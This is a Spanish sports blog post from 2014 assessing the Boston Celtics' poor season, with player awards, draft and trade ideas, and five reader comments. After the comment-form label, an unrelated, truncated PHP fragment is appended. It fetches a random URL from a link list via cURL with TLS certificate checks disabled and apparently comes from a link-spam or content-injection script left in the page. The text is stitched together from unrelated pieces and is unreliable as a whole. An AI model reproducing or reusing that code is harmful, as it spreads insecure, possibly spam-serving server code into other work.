Boston Celtics: Muy deficiente

25 de June de 2014 por TheDeerHunter

Un año anormalmente malo para un número excesivo de franquicias. Cogidos de la mano de su archirrival, los Boston Celtics no sólo han cuajado una de las peores campañas de toda su historia, sino que además no han mejorado prácticamente en nada la pésima situación de la que partían.  No han conseguido posiciones excesivamente ilusionantes de cara al draft, no han obtenido flexibilidad salarial, no tendrán fácil mejorar el nivel general de la plantilla este verano… Les pedíamos tan sólo 25 victorias a principio de curso, en un escenario catastrófico y ni siquiera las han alcanzado. Confiábamos que tanta derrota serviría para captar un pick top-3 y la lotería les ha dado la espalda.  Es lo que tiene apostar todo a una carta y, encima, no saber jugarla.

No sabríamos por dónde empezar en un curso plagado de calamidades. Hay quien pide desde ya una reconstrucción sobre la reconstrucción. Otros, mucho más optimistas, piden un gran traspaso por Kevin Love suponiendo que éste firmará después con los ojos cerrados. Mucho suponer, cuando aparentemente éste sale de Minnesota escaldado de una planificación deportiva perdedora. Imaginamos que en el medio estará la virtud.

rondoDe entrada, llevamos tiempo diciéndolo, no sabemos por qué Rajon Rondo sigue en la plantilla. Estamos hablando de uno de los mejores bases de la conferencia y, atendiendo a su ficha, uno de los más interesantes en calidad-precio. No debería de ser tan difícil encontrarle un destino. Para colmo este año, lo que ha jugado, ni fu ni fa, y así va camino de depreciarse todavía más tras tanta lesión. Imaginamos que el jugador deshoja la margarita, como han hecho todos, y el tiempo juega a su favor en la temporada que resta de su contrato. Hay que colocarlo lo antes posible para no acabar quedándose con poco o nada a cambio. Lo que les faltaría. Tampoco salió el expiring de Kris Humphries, aunque en su caso poco hubieran sacado y esos 12 millones que salen de los libros son el único alivio que obtienen sus cuentas. Además le han utilizado y no ha jugado mal. Jeff Green, que ha aprovechado la ocasión para revalorizarse, también está en la pista de salida. Veremos qué logran hacer con él, pero si mantienen el mismo tino que con Rondo aún vestirá durante una buena temporada la zamarra verde. A todo esto no han logrado limpiar su balance, con los más de 10 kilos por dos años que le quedan por cobrar a Gerald Wallace en uno de los peores contratos de la competición. Se antoja imposible librarse de él anticipadamente, visto lo visto.

En cambio sí se apresuraron a traspasar a Jordan Crawford, lo poco bueno deportivamente que se han tirado a la cara este curso, por un par de primeras rondas protegidas de valor aún por determinar y Joel Anthony, que apenas ha pisado el parqué. Una operación con cierto olor a tanking que difícilmente les sacará de pobres.

sullingerSu acierto en el draft tampoco ha sido la panacea recientemente.  La gran apuesta de este año, Kelly Olynyck, no ha brillado como se esperaba. Phil Pressey apenas ha contado en la rotación. Vitor Faverani comenzó muy bien pero pronto se lesionó. Su gran acierto de los últimos drafts ha sido Jared Sullinger, quien se ha consolidado como un activo fundamental para ellos y lo más parecido a tabla de salvación que poseen. Veremos qué es lo que pueden sacar en esas teóricas nueve primeras rondas que van a disfrutar en los cinco próximos veranos.

De momento ya les ha surgido un primer imprevisto gordo y se llama Joel Embiid. Algunos mocks le colocan a su alcance, en esa 6ª o en la 5ª elección de Utah por la que se rumoreaba que podían pujar. Una verdadera patata caliente, que seguramente no podrán dejar pasar llegado el caso. Si saliera bien sería un pelotazo, de eso no hay duda, porque además necesitan un Center como el comer, pero hay lógicas preocupaciones acerca de la gravedad de sus problemas físicos como los que ya amargaron la carrera a otros pívots célebres.  Por si fuera poco, por aquello de “si ponen un circo les crecen los enanos”, otro hipotético futurible como era Saric termina de renovar por 3 años con el Efes. No sabemos cuánto estarían dispuestos a esperarle los Celtics. Llama la atención que los dos drafteables de los que más se ha hablado durante la última semana en términos negativos vienen siendo vinculados a la órbita de la franquicia.

Por todos estos motivos se avecina un verano intenso en la oficina de Danny Ainge y otra temporada de calvario para los aficionados. El final del túnel aún queda lejos.

PREMIOS

MVP: Sólida temporada de Jared Sullinger en su segundo año. No posee gen de jugador franquicia pero es lo más parecido a intocable/intransferible que poseen ahora mismo los Celtics después de las primeras rondas. Conviene recordar que su elección también supuso cierta dosis de riesgo.

El rookie: Kelly Ollynyck ha cuajado una campaña relativamente sólida, de menos a más, e incluso ha sido nombrado en el segundo quinteto de rookies. No obstante muchos de nosotros esperábamos algo más tras lo visto en las pasadas summer league.

La sorpresa: Gran temporada también de Avery Bradley, curiosamente dejando completamente de lado su perfil point guard. Señalamos la involución ofensiva que sufrió en su segundo año y en éste se ha destapado como uno de los anotadores del equipo. Sigue siendo un excelente defensor de perímetro.

La decepción: Cuartos por la cola y sextos en la elección. No se posicionaron demasiado bien, pero la suerte tampoco les ha sonreído.

El mayor esfuerzo en vano: Otra impecable temporada de Brandon Bass, un jugador que por algún motivo nunca terminó de hacerse un cartel a la altura de su rendimiento. Además, dejándose la piel siempre contra pívots de mayor tamaño. Probablemente tratarán de traspasarlo ya que es uno de los activos más atractivos y de mejor colocación. Menudo premio.

JUGANDO A GM:

Hemos apuntado algunas de las múltiples alternativas que tienen los Celtics para moverse este verano. Una de ellas también puede ser utilizar, sin más, los picks que poseen y ser coherentes con la política que han mantenido los últimos tiempos. Se trata de las elecciones 6ª y 17ª de primera ronda. Dejando de lado los complicados casos de Embiid y Saric (que casualmente ambos serían los elegidos según el último mock de la ESPN) la primera podría ir a parar a un interior (Noah Vonleh, Aaron Gordon o Julius Randle) y la segunda a un tirador (James Young, Zach LaVine o Rodney Hood).

avery bradleyAvery Bradley va a ser agente libre restringido. La intención de la franquicia debería de ser retenerle, pues ha demostrado ser productivo y posee margen de mejora. Hay que tener en cuenta que con la firma de los dos rookies y la Qualifying offer sobre Bradley los Celtics pierden buena parte de su margen salarial. Si no se producen salidas importantes no estarán en disposición de pujar por ninguna pieza sólida en el mercado de agentes libres.

Hay team option sobre los jóvenes Chris Babb y Chris Johnson, además Phil Pressey termina contrato. Aunque no han demostrado demasiado, renovarles apenas afecta a la situación salarial. Alguno de ellos puede valer para completar un perímetro muy cogido por pinzas.

De los veteranos que terminan contrato, Khris Humphries, Keith Bogans y Jerryd Bayless sólo me plantearía retener al último, siempre que se mueva alrededor de las cifras actuales. Los otros dos (17 millones), con viento fresco. Para lo poco que ha jugado Vitor Faverani ha terminado saliendo demasiado caro y tampoco creemos que volverá al equipo.

Hemos hablado de las salidas de los jugadores más productivos. No será difícil colocar a Brandon Bass por algún activo de futuro. Ante las perspectivas de elección el draft su presencia podría resultar incluso improcedente. En el traspaso de Rajon Rondo podría tratar de empaquetarse a Gerald Wallace, aunque fuera a costa de recibir nada a cambio. Puestos a soñar…

Paul Pierce termina contrato con los Nets. Si no le sale ninguna posibilidad de anillo quizá esté dispuesto a ofrecer sus últimos servicios a la franquicia de sus amores, incluso con un buen descuento. No se me ocurre ningún mentor mejor para la nueva columna vertebral de jóvenes valores.

Con el espacio salarial sobrante traería algún veterano más para terminar de completar la plantilla. Hará falta un pívot y un base más, en plan temporeros. Nada de contratos largos. Toney Douglas y Byron Mullens podrían servir.

Así quedaría más o menos el equipo. El objetivo será hacer madurar a los jóvenes. Competir volverá a ser absolutamente secundario.

PG: Zach LaVine, Phil Pressey, Toney Douglas

SG: Avery Bradley, Jerryd Bayless

SF: Jeff Green, Paul Pierce, Chris Johnson

PF: Jared Sulinger, Aaron Gordon

C: Kelly Ollynyck, Byron Mullens

Comenta

5 comentarios a esta entrada

  1. portu dice:
    #1

    Ya salió bien apostar por las viejas glorias con KG y R. Allen y creo q éste es el momento de intentarlo de nuevo apostando por K. Love. El tankeo ha sido malo, ningún jugador q llegue al pick 6 (salvo Embiid si llega) te va a sacar de pobre, así q yo me tiraría a la piscina por K. Love. Habría q meter todo lo decente q joven q se pueda y creo q la oferta será la mejor q les pueda llegar a Minny. Se rumoreaba Sullinger/Olynyk + pick 6 + pick 17. Añadiría otra 1era futura si hiciera falta e incluso comernos algún contrato malo de los wolves… Un quinteto Rondo-Bradley-J.Green-K.Love-Olynyk/Sulli ofrece ciertas garantías para volver a la pelea en el Este. Completaría con una oferta a R. Allen y Pierce, renovaría de 6º hombre a Bayless, y con eso ya habría un buen bloque de 7-8 jugadores. Lo más importante sería volver al concepto defensivo como clave del éxito. Sobretodo Rondo y J. Green deberían volver a hacer lo q hacían en sus primeros años NBA, defender a muerte y ayudar en ataque, un ataque q debería comandar Love.
    Si lo de Love es un sueño incumplido y lo de Embiid tb se abre la posibilidad contraria, vender a Rondo, Bass y J. Green, buscar un 1 en el draft y si fuese posible, lo ideal sería conseguir otro pick alto con esas ventas y el pick 17. Buscar otro posible titular para posiciones exteriores o de center, pasando a Sullinger a su puesto natural, q es de 4.

      Citar

  2. Esteban dice:
    #2

    su situciacion a corto plazo no la veo tan mala como los demas

    es mala si pensamos en una reconstruccion para ser campeonesl alli minimamente tendran que esperar al menosn 7 años, ya que habria que sacar todo lo que hay y drafter desde este año y dos mas en los top de loterias

    pero en la actualidad, viendo el nivel de la conferencia este, un equipo que tiene a rondo, green, sullinger, bradley, con todo ese espacio salarial sumado a sus picks 6 y 17, se pueden hacer buenas ofertas para hacerse con una estrella este mismo año y competir

    dar los picks 6 y 17 por love, pero endulzar el acuerdo comiendose los contratos de Martin y Pekovic pdoria funcionar

    el plan ganar ahora de los Wolves con la salida de Love no tiene futuro, asi que les vendria bien sacarse de encima jugadores mayores con grandes saalrios como pekovic y martin, de un plumazo, se hacen con dos selecciones altas y tienen sus libros impecables hacia el futuro

    en cuanto a los Celtics, love, martin y pekovic podrian dar otra imangen en la conferencia este, sumados a green, bass y rondo, este serie un equipo que el proximo año como minimo deberia estar en semifinales de conferencia

      Citar

  3. Ruxixon dice:
    #3

    Pálpito de que serán uno de los protagonistas en la noche del draft,lo mismo se hace lo de Love,que será su objetivo primordial,pero si los Timberwolves no ceden,igual se salda la cosa con Embiid si está disponible en el 6,e ipso facto traspaso a los Kings con el pick 8 de por medio.

      Citar

  4. Ruxixon dice:
    #4

    El traspaso con Sacramento con Rondo metido en el ajo.

      Citar

  5. Jose Luis dice:
    #5

    Si pudieran esperar a ver que hace el Heat, esperaría.

    Si siguen fuertes, reconstruyo a lo grande

    Si se disuelve… quien hay fuerte en el Este? Los Pacers, sí, pero tampoco son tan aplastantemente superiores. Luego hay un buen grupo, Nets, Raptors, Wizards, Hawks… pero con un buen traspaso, estos Celtics se meten en ese grupo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>